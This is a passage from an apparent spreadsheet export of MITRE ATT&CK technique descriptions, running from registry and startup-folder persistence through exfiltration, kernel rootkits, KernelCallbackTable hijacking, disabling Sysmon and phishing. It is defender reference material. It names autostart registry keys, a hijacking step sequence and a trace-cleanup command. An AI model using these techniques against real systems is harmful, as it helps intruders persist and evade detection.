Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run automatically for the currently logged-on user.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
https://attack.mitre.org/techniques/T1547/001</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)
In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)
https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.
https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 
In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux &lt;code&gt;curl&lt;/code&gt; may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)
Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).
https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)
Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.
https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.
https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>T1574.013</t>
  </si>
  <si>
    <t>KernelCallbackTable</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;KernelCallbackTable&lt;/code&gt; of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once &lt;code&gt;user32.dll&lt;/code&gt; is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the &lt;code&gt;KernelCallbackTable&lt;/code&gt; by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be obtained by locating the PEB (ex: via a call to the &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be duplicated, and a function in the table (e.g., &lt;code&gt;fnCOPYDATA&lt;/code&gt;) set to the address of a malicious payload (ex: via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.
https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1597</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)
https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>T1496.001</t>
  </si>
  <si>
    <t>Compute Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
https://attack.mitre.org/techniques/T1496/001</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)
https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant) 
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.
https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)
https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) 
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational&lt;/code&gt; may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) 
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
